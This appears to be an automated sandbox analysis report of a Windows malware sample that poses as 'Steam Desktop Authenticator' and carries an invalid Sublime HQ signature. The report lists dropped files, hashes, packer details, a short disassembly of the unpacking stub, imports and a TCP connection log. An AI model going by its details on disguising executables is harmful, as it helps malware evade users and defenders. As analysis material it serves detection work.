                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpEE20.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpEE50.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Process:C:\Users\user\Desktop\Nb2HQZZDIf.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):979968
                                                                                                                                                                                              Entropy (8bit):7.361382512565047
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:cGRXJBEsyGeV5qLHKK1QK1MuSUqMidk++KANTbCPpUlmLXIRE:T9JB8rWHKK131MuadkJK4qrXIW
                                                                                                                                                                                              MD5:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              SHA1:BB965F2D97B19ED01702B8182BBD870670A1E75B
                                                                                                                                                                                              SHA-256:20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                                                                                                                                                                                              SHA-512:BD6C23385D7B914AD9A423D71DF9FA33BA917BA696270DF1435D90DE24B7B1286A7263FD10A027C17C41A899E5667F4481C83B385931ECCD244AEA7971D519F2
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................."...........@... ...`....@.. ....................................@.................................P@..K.......0....................`....................................................... ............... ..H............text.... ... ...".................. ..`.sdata.. ....`.......&..............@....rsrc...0............(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\field
                                                                                                                                                                                              Process:C:\Users\user\Desktop\Nb2HQZZDIf.exe
                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                              Entropy (8bit):4.529003957966892
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
                                                                                                                                                                                              MD5:EC6AAE2BB7D8781226EA61ADCA8F0586
                                                                                                                                                                                              SHA1:D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
                                                                                                                                                                                              SHA-256:B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
                                                                                                                                                                                              SHA-512:AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: .PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                              Entropy (8bit):7.539500203560168
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                                              File name:Nb2HQZZDIf.exe
                                                                                                                                                                                              File size:627616
                                                                                                                                                                                              MD5:b8371590264db62ecbba4b7f481a21a8
                                                                                                                                                                                              SHA1:837bfd10d70113330b2e00a1f12e99c4b0065d38
                                                                                                                                                                                              SHA256:fa3e22734ccb01da24364b65793ca5d2fafc53fbe6cef3eab8d76b158d1e0d7a
                                                                                                                                                                                              SHA512:235f087e2039835dc9c944178c34f6dc924a91d028b75b25c545b8a7b8eea81e4556ec1600fe9f04d36118bd93ed4cccfbbc0f135296fcd5776c366db51979f1
                                                                                                                                                                                              SSDEEP:12288:37iuUvUF2JxjnxXAHbcbzlarx98lR1omCAIEwQbbC+3q99:37iuUvFjxXjgM4mCbEwQbbC+3q99
                                                                                                                                                                                              File Content Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d....4.V..........#..........Z......R3.........@.............................p......D..... ...@..............................................0..X....@..H%...p..4_...l...'.................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:70cc8c6d69aacc70

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x140143352
                                                                                                                                                                                              Entrypoint Section:.MPRESS2
                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                                                                                                              Time Stamp:0x56F734A2 [Sun Mar 27 01:17:22 2016 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                              OS Version Minor:2
                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                              File Version Minor:2
                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                              Subsystem Version Minor:2
                                                                                                                                                                                              Import Hash:caa5e6a2892587c2324418efee31c648

                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                              Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                              • 5/22/2019 5:00:00 PM 5/23/2023 4:59:59 PM
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                              • CN=Sublime HQ Pty Ltd, O=Sublime HQ Pty Ltd, STREET=Suite 102, STREET=377 New South Head Rd, L=Doubte Bay, S=NSW, PostalCode=2028, C=AU
                                                                                                                                                                                              Version:3
                                                                                                                                                                                              Thumbprint MD5:A32549731E28A0F6BA85C9B2C50FE589
                                                                                                                                                                                              Thumbprint SHA-1:834F29A60152CE36EB54AF37CA5F8EC029ECCF01
                                                                                                                                                                                              Thumbprint SHA-256:E025B15847B86808B69C605D7FC63A186CBF1D9A4ED5A1971B2FF5F9C6F50DF0
                                                                                                                                                                                              Serial:00972FADA2BC13FA55C5D47FEF56AEE0F4

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              push edi
                                                                                                                                                                                              push esi
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              push edx
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              push eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              lea eax, dword ptr [00000ADEh]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov esi, dword ptr [eax]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esi, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub eax, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov edi, esi
                                                                                                                                                                                              lodsw
                                                                                                                                                                                              shl eax, 0Ch
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              push eax
                                                                                                                                                                                              lodsd
                                                                                                                                                                                              sub ecx, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esi, ecx
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              push edi
                                                                                                                                                                                              inc esp
                                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                                              dec ecx
                                                                                                                                                                                              mov al, byte ptr [ecx+edi+06h]
                                                                                                                                                                                              mov byte ptr [ecx+esi], al
                                                                                                                                                                                              jne 00007FF6507C9637h
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              sub eax, eax
                                                                                                                                                                                              lodsb
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              shr ecx, 04h
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              and al, 0Fh
                                                                                                                                                                                              push eax
                                                                                                                                                                                              lodsb
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              add cl, byte ptr [esp]
                                                                                                                                                                                              push eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ebp, FFFFFD00h
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              shl ebp, cl
                                                                                                                                                                                              pop ecx
                                                                                                                                                                                              pop eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              shl eax, 20h
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add ecx, eax
                                                                                                                                                                                              pop eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ebx, esp
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              lea esp, dword ptr [esp+ebp*2-00000E70h]
                                                                                                                                                                                              push eax
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub ecx, ecx
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ecx, esp
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              mov dx, word ptr [edi]
                                                                                                                                                                                              shl edx, 0Ch
                                                                                                                                                                                              push edx
                                                                                                                                                                                              push edi
                                                                                                                                                                                              dec esp
                                                                                                                                                                                              lea ecx, dword ptr [ecx+08h]
                                                                                                                                                                                              dec ecx
                                                                                                                                                                                              lea ecx, dword ptr [ecx+08h]
                                                                                                                                                                                              push esi
                                                                                                                                                                                              pop edx
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                              call 00007FF6507C970Dh
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov esp, ebx
                                                                                                                                                                                              pop ebp
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              pop ecx
                                                                                                                                                                                              pop esi
                                                                                                                                                                                              pop edx
                                                                                                                                                                                              sub edx, 00001000h
                                                                                                                                                                                              sub ecx, ecx
                                                                                                                                                                                              cmp ecx, edx
                                                                                                                                                                                              jnc 00007FF6507C968Ch
                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                              lodsb
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              cmp al, FFh
                                                                                                                                                                                              jne 00007FF6507C964Fh
                                                                                                                                                                                              mov al, byte ptr [esi]
                                                                                                                                                                                              and al, FDh
                                                                                                                                                                                              cmp al, 15h
                                                                                                                                                                                              jne 00007FF6507C962Dh
                                                                                                                                                                                              lodsb
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              jmp 00007FF6507C9659h
                                                                                                                                                                                              cmp al, 8Dh
                                                                                                                                                                                              jne 00007FF6507C964Fh
                                                                                                                                                                                              mov al, byte ptr [esi]
                                                                                                                                                                                              and al, C7h

                                                                                                                                                                                              Data Directories

                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1430000x358.MPRESS2
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1440000x32548.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1070000x5f34.MPRESS1
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x96c000x27a0.MPRESS1
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x143e500x28.MPRESS2
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1431180xd0.MPRESS2
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                              Sections

                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .MPRESS10x10000x1420000x63400False1.00032224103basic-16 executable not stripped7.9995184158IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .MPRESS20x1430000xe800x1000False0.507568359375data5.65816934801IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rsrc0x1440000x325480x32600False0.374694672767data5.82867750581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                              Resources

                                                                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                                                                              RT_ICON0x1440f00x903cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                              RT_ICON0x14d1540x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                                                                                                              RT_ICON0x15d9a40x94a8dataEnglishUnited States
                                                                                                                                                                                              RT_ICON0x166e740x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                              RT_ICON0x1673040x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                              RT_ICON0x1677940x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                              RT_ICON0x167c240x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                              RT_ICON0x167d740x5488dataEnglishUnited States
                                                                                                                                                                                              RT_ICON0x16d2240x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294909696EnglishUnited States
                                                                                                                                                                                              RT_ICON0x1714740x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                              RT_ICON0x173a440x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                              RT_ICON0x174b140x988dataEnglishUnited States
                                                                                                                                                                                              RT_ICON0x1754c40x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                              RT_MENU0x141bcc0x2c8emptyEnglishUnited States
                                                                                                                                                                                              RT_DIALOG0x141e940xe8emptyEnglishUnited States
                                                                                                                                                                                              RT_ACCELERATOR0x141f7c0x48emptyEnglishUnited States
                                                                                                                                                                                              RT_RCDATA0x141fc40x107emptyEnglishUnited States
                                                                                                                                                                                              RT_GROUP_ICON0x175aac0x84dataEnglishUnited States
                                                                                                                                                                                              RT_GROUP_ICON0x175b580x14dataEnglishUnited States
                                                                                                                                                                                              RT_GROUP_ICON0x175b940x14dataEnglishUnited States
                                                                                                                                                                                              RT_GROUP_ICON0x175bd00x14dataEnglishUnited States
                                                                                                                                                                                              RT_GROUP_ICON0x175c0c0x14dataEnglishUnited States
                                                                                                                                                                                              RT_VERSION0x175c600x41edata
                                                                                                                                                                                              RT_MANIFEST0x1760c00x487ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                                              Imports

                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              KERNEL32GetModuleHandleA, GetProcAddress
                                                                                                                                                                                              WSOCK32.dllWSACleanup
                                                                                                                                                                                              WINMM.dllmixerOpen
                                                                                                                                                                                              VERSION.dllVerQueryValueW
                                                                                                                                                                                              COMCTL32.dllImageList_Create
                                                                                                                                                                                              PSAPI.DLLGetModuleBaseNameW
                                                                                                                                                                                              USER32.dllGetDC
                                                                                                                                                                                              GDI32.dllBitBlt
                                                                                                                                                                                              COMDLG32.dllGetOpenFileNameW
                                                                                                                                                                                              ADVAPI32.dllRegCloseKey
                                                                                                                                                                                              SHELL32.dllDragFinish
                                                                                                                                                                                              ole32.dllCoGetObject
                                                                                                                                                                                              OLEAUT32.dllSafeArrayGetLBound

                                                                                                                                                                                              Version Infos

                                                                                                                                                                                              DescriptionData
                                                                                                                                                                                              Translation0x0000 0x04b0
                                                                                                                                                                                              LegalCopyrightCopyright 2017
                                                                                                                                                                                              Assembly Version1.0.10.0
                                                                                                                                                                                              InternalNameSteam Desktop Authenticator.exe
                                                                                                                                                                                              FileVersion1.0.10
                                                                                                                                                                                              CompanyName
                                                                                                                                                                                              LegalTrademarks
                                                                                                                                                                                              CommentsDesktop implementation of Steam's mobile authenticator app
                                                                                                                                                                                              ProductNameSteam Desktop Authenticator
                                                                                                                                                                                              ProductVersion1.0.10
                                                                                                                                                                                              FileDescriptionSteam Desktop Authenticator
                                                                                                                                                                                              OriginalFilenameSteam Desktop Authenticator.exe

                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jul 22, 2021 11:37:57.835788965 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:57.907870054 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:57.907979012 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:57.952886105 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.025031090 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027740002 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027829885 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027832031 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027894020 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027895927 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027946949 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.027951956 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.028001070 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.114913940 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.187679052 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.187784910 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.218879938 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.299460888 CEST4434971488.99.66.31192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.299544096 CEST49714443192.168.2.388.99.66.31
                                                                                                                                                                                              Jul 22, 2021 11:37:58.429246902 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.470644951 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.470773935 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.471461058 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.512767076 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.516707897 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.516778946 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.516823053 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.516897917 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.533257008 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.574512005 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.574672937 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.574744940 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.575479031 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.616698027 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.802011013 CEST44349715104.25.233.53192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.802097082 CEST49715443192.168.2.3104.25.233.53
                                                                                                                                                                                              Jul 22, 2021 11:37:58.892808914 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:58.934436083 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:58.934623957 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:58.936161041 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:58.978127003 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.155333042 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.155380964 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.155395031 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.155512094 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.155566931 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.171494961 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.184787035 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.184953928 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.213407040 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.302983046 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.303200006 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.305109978 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.347016096 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.500459909 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.500571012 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.500804901 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.524820089 CEST44349716104.192.141.1192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.525036097 CEST49716443192.168.2.3104.192.141.1
                                                                                                                                                                                              Jul 22, 2021 11:37:59.601762056 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.771356106 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.771563053 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.772926092 CEST49717443192.168.2.352.216.94.27
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939544916 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939569950 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939593077 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939620018 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939636946 CEST4434971752.216.94.27192.168.2.3
                                                                                                                                                                                              Jul 22, 2021 11:37:59.939640999 CEST49717443192.168.2.352.216.94.27
